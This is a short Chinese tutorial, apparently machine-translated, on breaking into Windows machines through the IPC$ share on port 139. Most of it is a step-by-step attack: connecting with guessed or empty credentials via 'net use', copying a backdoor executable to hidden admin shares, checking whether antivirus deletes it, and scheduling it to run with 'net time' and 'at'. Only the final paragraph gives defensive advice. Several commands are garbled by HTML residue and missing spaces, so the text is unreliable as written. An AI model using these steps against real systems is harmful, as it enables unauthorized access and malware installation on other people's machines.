说到139端口,我想一定有很多人知道。 我本来不想写这个教程,但是考虑到对新人的照顾,我会简单地写一下。
首先,连接的命令如下。
netuse\IP地址ipc$Content$lt; 空间密码/user:用户名
假设要连接的IP地址为192.168.1.11,用户名为google,使用的密码为123456,则要连接的139端口通道的格式为:
netuse192.168.1.11IPC $ content $ nbsp; 123456/user :谷歌连接成功后,将显示“命令正常完成”的信息。
空密码如下:
如果密码为空,请在输入密码的位置将其替换为“”。
开始显示访问权限:
查看登录后的用户权限的方法很简单。 把文件传输到目标系统就可以了。 如果传输成功,一般是系统管理员权限。 如果不成功,可能是访问者权限或其他用户组的。 命令的格式如下。
复制文件的绝对路径\IP地址文件目标路径
例如,将本地c驱动器下的a.exe文件复制到192.168.1.11的D驱动器下。
copyc :a.exe\ 192.168.1.11d $ content $ nbsp;
请注意“$”符号。 那是隐藏共享磁盘的符号。 如果对方的共享磁盘没有被隐藏,就不需要“$”符号。 如果命令成功执行,还会显示“已复制一个文件”消息
小技巧:
再次将同一文件复制到同一路径,检测是否有防病毒软件。
“\192.168.1.11d$a.exe是否要重写? (Yes/No/All ) : )”中,文档还在对象系统中,没有被杀毒软件检查(一般发送过来的只是后门程序,只有系统安装了杀毒软件如果没有显示信息,表示安装了防病毒软件。
检查目标系统的时间,准备使用at任务计划运行程序。
命令格式: nettime\IP地址
示例: net time \192.168.1.11
系统返回目标的当前时间,显示时间后,AT任务调度命令必须使用24小时制。 例如,如果AT任务计划命令使用“\192.168.1.11的当前时间为2006/5/10下午06:02”,则必须将“下午06:02”转换为“18:02”
使用AT命令将任务计划添加到目标系统:
格式: at\IP地址指定要在运行时运行的文件路径名
示例: at192.168.1.1118336020 d :a.exe
IPC通道入侵现在是非常古老的攻击手段,现在对IPC通道的防御手段也越来越多,越来越简单。 但是,如果攻击者获得了IPC通道的System权限,那对被攻击的系统来说是无意中致命的。 因此,建议用户关闭Server服务,同时关闭信使服务和任务计划器服务(计划任务)。 这样可以更全面地保护计算机在IPC通道中的安全。